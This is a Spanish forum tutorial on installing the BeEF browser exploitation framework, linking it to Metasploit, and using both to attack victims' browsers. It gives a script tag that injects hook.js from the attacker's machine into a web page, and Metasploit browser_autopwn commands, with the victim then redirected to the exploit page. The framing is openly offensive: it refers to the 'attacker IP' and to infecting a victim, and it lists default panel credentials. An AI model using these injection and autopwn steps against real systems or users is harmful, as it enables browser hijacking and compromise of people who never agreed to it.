Instalando Beef + Metasploit

Iniciado por blackdrake, Julio 30, 2013, 12:56:01 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Julio 30, 2013, 12:56:01 PM Ultima modificación: Noviembre 17, 2014, 08:13:41 AM por blackdrake
Bueno, hoy os traigo un tutorial, es bastante básico pero lo busqué para ver si estaba y no lo encontré asique os lo hago para vosotros ;D

Vamos a empezar por descargar el beef --> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Para que funcione, necesitamos tener instalado las siguientes depencias: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (os lo detallaría más, pero no se que s.o usáis cada uno xD)


Una vez todo instalado, vamos a integrarlo con metasploit, para ello vamos al directorio donde tenemos los archivos del beef.



Localizamos el fichero config.yaml y lo abrimos, vamos a la línea 113 o bien buscamos la palabra "metasploit"

Y lo activamos de esta manera:

Código: php
metasploit:
enable: true


Grabamos el archivo y nos dirigimos de nuevo al directorio del beef después a extensions/metasploit y buscamos un fichero que se llama config.yaml

Modificamos las líneas introduciendo la IP de nuestro ordenador. Para evitar conflictos por si nuestra IP cambia, pondremos 127.0.0.1

Código: php
host: "127.0.0.1"



Una vez configurados los dos archivos, ejecutamos metasploit:



Una vez se haya cargando, introducimos lo siguiente: (Teneis que ponerlo respecto a como tengais el config.yaml de /extensions/metasploit)

Código: php
load msgrpc SeverHost=127.0.0.1 Pass=abc123





Una vez hayamos hecho esto, vamos a ejecutar beef, para ello accedemos al directorio y lo ejecutamos de esta manera.

Código: php
./beef -x -v




Esperamos a que cargue, una vez finalizado, podemos ver la dirección de nuestro panel:



Accedemos a esa dirección y nos logueamos:

Usuario: beef
Contraseña: beef



Ahora vamos a infectar a una máquina, en mi caso seré yo mismo xD

Para infectar a una máquina hay que conseguir que cargue el fichero hook.js, para ello en una página web habría que introducir lo siguiente:

Código: php
<script src="http://192.168.1.34:3000/hook.js"></script>


Una vez tengamos a la máquina en el panel podemos iniciar el ataque.




Como vemos, en el apartado de metasploit nos salen los exploits, ya que lo hemos implementado anteriormente.


Otro método de ataque es cargar el autopwn de metasploit y luego redirigir a la víctima a la dirección del autopwn:

Para cargarlo, vamos a la consola de metasploit e introducimos estos parámetros:

use auxiliary/server/browser_autopwn (Usar el modulo browser_autopwn)
set lhost 192.168.1.34 (IP del Atacante)
set srvhost 192.168.1.34 (IP del Atacante)
set uripath / (Path del link a enviar)
set srvport 8080 (Puerto)
exploit



Y esperamos a que termine de cargar... (en un ataque se recomienda tener ya el autopwn cargado ya que tarda).



Una vez cargando, vamos a redirigir a la víctima a la página que nos genera el autopwn:






Posibles errores al ejecutar beef.



Solución:

-Actualizar Ruby o bien:





Visitar: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta si teneis ese error, para instalar rvm


Y eso es todo, ya tendríamos el beef integrado con metasploit y perfectamente funcionando ;D

Un saludo.